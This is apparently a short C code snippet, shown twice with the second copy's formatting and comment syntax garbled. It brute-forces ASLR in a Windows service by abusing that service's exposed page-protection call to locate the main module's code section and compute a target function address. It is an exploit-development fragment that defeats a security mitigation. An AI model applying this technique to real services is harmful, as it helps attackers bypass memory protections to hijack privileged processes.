SouhailHammou/Vp_ASLR_bf.c

## Vp_ASLR_bf.c
pid = /*Locate the service's pid with the help of NtQuerySystemInformation*/;
for( Page = 0x1000; Page < 0x7fffffff; Page += 0x1000 )
{
    Page_cp = Page;
    OldProtection = CommunicateServiceVirtualProtect(
                    pid, //We give the service its own pid
                    Page, //Address of the page in the service's process
                    PAGE_EXECUTE_READWRITE, //Change to the most permissible protection to avoid crashes
                    0x1000
              );

    if ( OldProtection == -1 ) //Invalid page
        continue;

    if ( OldProtection == PAGE_EXECUTE_READ )
    {
        //this is the main module's .text section
        Base = Page - 0x1000;
        Page = 0x7fffefff; //to break after restoring the old protection
    }

    //restore the old protection
    CommunicateServiceVirtualProtect(
                    pid,
                    Page_cp,
                    OldProtection,
                    0x1000
              );
}

//Use the base to calculate the function address
pFunc = Base + FuncOffset;
//....
	pid = /Locate the service's pid with the help of NtQuerySystemInformation/;
	for( Page = 0x1000; Page < 0x7fffffff; Page += 0x1000 )
	{
	Page_cp = Page;
	OldProtection = CommunicateServiceVirtualProtect(
	pid, //We give the service its own pid
	Page, //Address of the page in the service's process
	PAGE_EXECUTE_READWRITE, //Change to the most permissible protection to avoid crashes
	0x1000
	);

	if ( OldProtection == -1 ) //Invalid page
	continue;

	if ( OldProtection == PAGE_EXECUTE_READ )
	{
	//this is the main module's .text section
	Base = Page - 0x1000;
	Page = 0x7fffefff; //to break after restoring the old protection
	}

	//restore the old protection
	CommunicateServiceVirtualProtect(
	pid,
	Page_cp,
	OldProtection,
	0x1000
	);
	}

	//Use the base to calculate the function address
	pFunc = Base + FuncOffset;
	//....